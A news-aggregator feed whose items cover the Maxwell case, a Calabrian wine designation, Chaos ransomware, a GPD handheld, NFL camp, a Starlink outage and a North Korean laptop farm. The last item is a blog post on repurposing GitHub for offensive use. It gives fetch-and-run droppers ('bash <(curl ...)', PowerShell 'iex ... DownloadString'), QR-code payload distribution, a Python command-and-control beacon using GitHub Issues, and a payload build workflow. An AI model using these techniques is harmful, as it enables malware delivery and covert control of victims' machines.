• Ghislaine Maxwell’s lawyer suggests possibility of presidential pardon as Trump says it’s ‘not the time’ – as it happened

    This blog is now closed. Read our latest story here

    Donald Trump has said Hamas “did not want to make a deal” on a ceasefire and hostage release in Gaza.

    Speaking to reporters at the White House earlier, the president’s comments echoed those of his Middle East envoy, Steve Witkoff, who said yesterday the Trump team had pulled its negotiators for consultations following Hamas’s latest proposal.

    Continue reading…


    Source: World news | The Guardian.

  • Riceviamo e pubblichiamo

    Con grande soddisfazione accogliamo la notizia dell’iscrizione del Cirò Classico nel registro delle Denominazioni di origine protetta (Dop) da parte della Commissione Europea.

    Si tratta di un traguardo prestigioso che premia l’impegno quotidiano dei nostri produttori, dei viticoltori e delle comunità locali, autentici custodi di una tradizione millenaria e di un patrimonio agricolo unico.

    Il riconoscimento conferito al Cirò Classico non è solo un sigillo di eccellenza enologica, ma rappresenta anche una straordinaria valorizzazione del territorio calabrese e della sua biodiversità.

    Questo risultato è il frutto di un lavoro collettivo di produttori e istituzioni, che porta con sé la passione, la competenza e l’orgoglio di una regione che guarda con fiducia ad un settore su cui, su indicazione del Presidente Occhiuto, stiamo puntando molto.

    Un ringraziamento sentito va al Ministro dell’Agricoltura, della Sovranità alimentare e delle Foreste, Francesco Lollobrigida, per aver creduto con determinazione nel percorso avviato e per il costante impegno a favore della valorizzazione delle produzioni tipiche italiane.

    Il Cirò Classico Dop diventa ora ambasciatore della Calabria nel mondo, simbolo di autenticità, identità e futuro.


    Source: Irriverentemente.

  • After BlackSuit is taken down, new ransomware group Chaos emerges

    Hot on the heels of a major ransomware group being taken down through an international law enforcement operation comes a new development that highlights the whack-a-mole nature of such actions: A new group, likely comprised of some of the same members, has already taken its place.

    The new group calls itself Chaos, in recognition of the .chaos name extension its ransomware stamps on files it has encrypted and the “readme.chaos[.]txt” name given to ransom notes sent to victims. Researchers at Cisco’s Talos Security Group said Thursday that since Chaos emerged in February, it has engaged in “big-game hunting”—meaning attacks designed to extract hefty payments—that have mainly targeted organizations in the US and, to a lesser extent, the UK, New Zealand, and India. Talos said it recently observed the group demanding a ransom of about $300,000.

    In exchange for paying the demanded ransom, victims get a pinky swear that they’ll receive a decryptor and a detailed report of the vulnerabilities the group members found in the victim’s network and that the group will delete all the data in its possession. Victims who refuse to pay face the threat of never getting their data unlocked, having data publicly disclosed, and being subjected to distributed denial-of-service attacks.

    Read full article

    Comments


    Source: Ars Technica.

  • Stock Bulls Drive S&P 500 Up Every Day This Week | The Close 7/25/2025

    Bloomberg Television brings you the latest news and analysis leading up to the final minutes and seconds before and after the closing bell on Wall Street. Today’s guests are NewEdge Wealth’s Brian Nick, Aon’s Edmund Reese, Wedbush’s Matt Bryson, , Former LVMH Chairman Pauline Brown, Goldman Sachs’ Katherine Bordlemay , Onsemi’s Hassane El-Khoury, Wedbush’s Dan Ives, VanntageScore’s Silvio Tavares, ComScore’s Paul Dergarabedian. (Source: Bloomberg)


    Source: Bloomberg Markets.

  • GPD’s monster Strix Halo handheld requires a battery ‘backpack’ or a 180W charger

    Yesterday, I mentioned how GPD is teasing the most potent handheld yet made — a GPD Win 5 that will house the Ryzen AI Max+ 395 chip, with AMD’s most powerful integrated graphics yet, inside a PlayStation Vita-shaped machine.

    If you’ve been wondering how that huge chip could even fit, handheld expert Cary “The Phawx” Golomb now has the answer: the 7-inch handheld will apparently have no internal battery taking up space. The Win 5 is designed to either be plugged into the wall, with a gaming laptop sized 180-watt charger providing the juice — or powered by a big 80 watt-hour external battery “backpack” that will (only? additionally?) be sold separately.

    We can see the full spec sheet for the new Win 5 in the Phawx’s video, and as he notes, GPD had to make its Win 5 larger than the Win 4 even before you add that backpack battery.

    While the Win 4 is a compact 6-inch handheld with a 45 watt-hour pack, the Win 5 with its 7-inch screen will be narrower but thicker than the Asus ROG Ally X handheld — which is an apt comparison, considering that handheld similarly pairs a 7-inch screen with an 80 watt-hour battery pack.

    Here, though, the battery will add extra girth: it’s roughly 4 inches (110mm) wide and tall, and 0.7 inches (18mm) deep; it’s not clear how it attaches yet, as GPD has only shared the one dark video of the Win 5 filmed from the front, but the spec sheet mentions a “Battery to Host Dedicated Connector” as an accessory, so it might require plugging in a cable.

    If you’re curious what the handheld’s controls might look like in better light, I tried brightening it up:

    Other intriguing things we can see in the full spec sheet include:

    • A 120Hz variable refresh rate screen, where the Win 4 was limited to 60Hz
    • Two configs: AMD Ryzen AI Max+ 395 (16C/32T/ Radeon 8060S) or AI Max 385 (8C/16T/ Radeon 8050S)
    • 32, 64, or even the full 128GB of unified memory AMD offers for these chips
    • USB-4 with 100W PD charging and 8K/60 DP output
    • Two fans and four heat pipes for cooling
    • An optional HDMI and USB dock with a “battery charging slot,” presumably for the external battery
    • No mention of any integrated keyboard, whereas previous Win devices had a hidden keyboard underneath a sliding screen

    You can peruse the whole sheet at your leisure in the Phawx’s video or the screenshots we took from Phawx (with his permission) below. Be sure to tap a couple of times to make them large enough for full reading.


    Source: The Verge.

  • BEREA, Ohio — Shedeur Sanders said he’s not thinking about the limited practice reps he’s received as the Cleveland Browns‘ four-way quarterback competition is underway in training camp.

    Sanders was regarded as one of the top quarterbacks in the 2025 NFL draft before surprisingly falling to the fifth round, where Cleveland took him with the 144th pick. He has seemingly been QB4 on the depth chart behind veterans Joe Flacco and Kenny Pickett and fellow rookie Dillon Gabriel, who was selected in the third round.

    Sanders is the lone quarterback who has not been seen taking reps with the first-team offense in the offseason workout program and through the first two training camp practices.

    “I don’t think that’s my place to answer, to give the answer to that,” Sanders said Friday when asked why he thinks he isn’t getting reps with the first-team offense. “I feel like that it’s not in my control, so I’m not going to think about that or even have that in my thought process of why it is. There’s a lot of people who want to have the opportunity to be at this level, and I’m here and I’m thankful to have the opportunity. So, whenever that is, that is.”

    He added: “It doesn’t make me feel down or left out because I know who I am as a person. I know who I am as an individual and I know what I could bring to this team. So, I can never feel less than any circumstance.”

    Browns coach Kevin Stefanski said the quarterback rotation would be fluid during the first week of training camp before reassessing the order for Week 2. On Wednesday, Pickett took all of the first-team snaps in 11-on-11 drills and on Thursday, Pickett and Flacco split the first-team reps in team drills. On Friday, Flacco, Pickett and Gabriel all split reps with the first-team offense during team drills. Sanders mainly worked with the third-team offense but got one session working with the second-team offense during the final set of 11-on-11 drills.

    “I don’t know if there’ll be any earth-shattering or earth-shaking changes [in the second week of camp],” quarterbacks coach Bill Musgrave said Friday. “I think it’ll be a lot more of the same. All four guys are really making good progress and [offensive coordinator] Tommy [Rees] and Kevin are doing a great job of getting everybody their looks.”

    With a wide receiver room that has been stretched thin because of four quarterbacks needing reps, Sanders has thrown passes at times to members of the equipment staff as the last in line for individual drills. Sanders, though, said he’s unaffected by it.

    “It doesn’t really faze me,” said Sanders, the son of Pro Football Hall of Famer Deion Sanders. “We came all the way from an HBCU to a Power 5 and now we’re here. So at this point, if you look there’s nothing that’s a challenge, I would say.”

    Sanders also commented on the two offseason speeding tickets he received in Cleveland, saying he hopes “everyone learns from my situation to not drive fast at all.”


    Source: www.espn.com – TOP.

  • Starlink kept me connected to the Internet without fail—until Thursday

    A rare global interruption in the Starlink satellite Internet network knocked subscribers offline for more than two hours on Thursday, the longest widespread outage since SpaceX opened the service to consumers nearly five years ago.

    The outage affected civilian and military users, creating an inconvenience for many but cutting off a critical lifeline for those who rely on Starlink for military operations, health care, and other applications.

    Michael Nicolls, SpaceX’s vice president of Starlink engineering, wrote on X that the network outage lasted approximately 2.5 hours.

    Read full article

    Comments


    Source: Ars Technica.

  • North Korean hackers ran US-based “laptop farm” from Arizona woman’s home

    Christina Chapman, a 50-year-old Arizona woman, has just been sentenced to 102 months in prison for helping North Korean hackers steal US identities in order to get “remote” IT jobs with more than 300 American companies, including Nike. The scheme funneled millions of dollars to the North Korean state.

    Why did Chapman do it? In a letter sent this week to the judge, Chapman said that she was “looking for a job that was Monday through Friday that would allow me to be present for my mom” who was battling cancer. (Her mother died in 2023.) But “the area where we lived didn’t provide for a lot of job opportunities that fit what I needed. I also thought that the job was allowing me to help others.”

    She offered her “deepest and sincerest apologies to any person who was harmed by my actions,” thanked the FBI for busting her, and said that when she gets out of prison, she hopes to “pursue the books that I have been working on writing and starting my own underwear company.”

    Read full article

    Comments


    Source: Ars Technica.

  • The Octocat Isn’t What It Seems

    Introduction

    If there’s one thing I’ve figured out, it’s this: the minute you start thinking you’re the smartest person in the room, you’re probably about to get blindsided. There’s always someone who sees things from an angle you never considered. I try to approach everything with curiosity instead of ego because most of my best discoveries have come from admitting what I didn’t know and keeping my eyes open for what I might find.

    GitHub started out for me as just a place to share scripts and tinker with ideas. But over time, I realized it’s more than a tool it’s a playground for experiments, a blank canvas for odd ideas, and a perfect place to push at the edges of what’s possible.

    Seeing GitHub With Different Eyes

    I’m not an expert. I just like to experiment, break things, and see how platforms behave when used in ways nobody expected.

    A lot of people see GitHub as a place for open-source collaboration. For me, it turned into a weird, creative outlet for exploring the intersection between coding, hacking, and digital mischief and as an artistic outlet.

    Some of the things I noticed along the way:

    GitHub Pages isn’t just for simple websites you can host almost anything there, from redirectors to payloads and even interactive CTF challenges.

    Gists and issues can be repurposed into covert message boards, signaling channels, or even ad-hoc command and control networks.

    Automation and uploads are easy to script, meaning you can set up workflows, drop files, or even quietly track who’s poking around your repos.

    What I’ve Tried (and Learned)

    Most of my projects and experiments started out as questions:

    Can I use GitHub as a C2 server?

    Can I distribute payloads just by posting QR codes somewhere public?

    Can I track curious eyes or create a trail of breadcrumbs for people who know where to look?

    Some of my experiments and concrete workflow examples:

    Payload Hosting via GitHub

    Serve any file using raw.githubusercontent.com:

    curl -O https://raw.githubusercontent.com///main/payload.sh

    Automate the delivery with PowerShell or bash droppers that always pull the latest script:

    bash <(curl -s https://raw.githubusercontent.com///main/install.sh)

    Or in PowerShell:

    iex (New-Object Net.WebClient).DownloadString(‘https://raw.githubusercontent.com///main/payload.ps1′)

    QR Code Payload Distribution

    I started experimenting with QR codes linking to raw GitHub files or GitHub Pages.

    Generate a QR code (Linux):

    qrencode -o flyer.png ‘https://github.com///releases/latest/download/payload.zip’

    Or for a web landing page:

    qrencode -o flyer.png ‘https://.github.io//’

    Distribute these at meetups, on stickers, or digitally see who visits or downloads.

    Tracking File Access (Honeytokens/Canaries)

    Plant decoy files in public repos:

    secrets.json
    flag.txt
    admin_backup.zip

    Track access/downloads with GitHub’s traffic insights or set up simple webhooks.
    Or monitor for clones and fetches via the GitHub API:

    import requests
    repo = “username/repo”
    r = requests.get(
    f’https://api.github.com/repos/{repo}/traffic/clones‘,
    headers={‘Authorization’: ‘token ‘}
    )
    print(r.json())

    Command-and-Control (C2) Signaling With Issues & Gists

    Use the GitHub API to post signals:

    import requests

    def send_beacon(repo, msg, token):
    url = f”https://api.github.com/repos/{repo}/issues“
    data = {“title”: “beacon”, “body”: msg}
    headers = {“Authorization”: f”token {token}”}
    requests.post(url, json=data, headers=headers)

    Bots can poll the repo for new issues or comments as a way to send/receive instructions.

    Automation & Continuous Delivery

    Set up a GitHub Action to build, obfuscate, or deploy payloads:

    .github/workflows/build.yml

    name: Build & Release
    on: [push]
    jobs:
    build:
    runs-on: ubuntu-latest
    steps:
    – uses: actions/checkout@v4
    – name: Build Payload
    run: ./build_payload.sh
    – name: Upload Release
    uses: actions/upload-release-asset@v1
    with:
    upload_url: ${{ github.event.release.upload_url }}
    asset_path: ./payload.bin
    asset_name: payload.bin
    asset_content_type: application/octet-stream

    Metadata & Steganography Tinkering

    Experiment with hiding information or versioning clues in repo art.

    Add metadata to an image:

    exiftool -Comment=”Nothing is what it seems.” octocat.png

    Hide a message in an image (using Python):

    from stegano import lsb
    secret_img = lsb.hide(“octocat.png”, “The real payload is elsewhere”)
    secret_img.save(“octocat_stego.png”)

    Scanning for Secrets and Sensitive Artifacts

    Tools like truffleHog and Gitleaks can hunt for hardcoded secrets, keys, or suspicious files.

    Scan a repo for secrets:

    trufflehog git https://github.com//
    gitleaks detect –source .

    The Octocat (and Everything Else) Isn’t What It Seems

    Over time, it became obvious that almost everything in this ecosystem has layers,mascots, platforms, even simple posts like this one. What starts out as one thing is always being reimagined for a different purpose.

    The Octocat is a perfect metaphor: part cat, part octopus, always just a bit of a mystery. I try to approach platforms with the same mindset curious, flexible, and never assuming I have all the answers.

    Why Bother? (And Why Keep Sharing?)

    I keep building and sharing these projects mostly for the fun and satisfaction of figuring things out. There’s something rewarding about discovering tricks for yourself, even if others have done it before. Sometimes, the most interesting workflows are the ones nobody told you about.

    thank you for taking the time to read


    Source: DEV Community.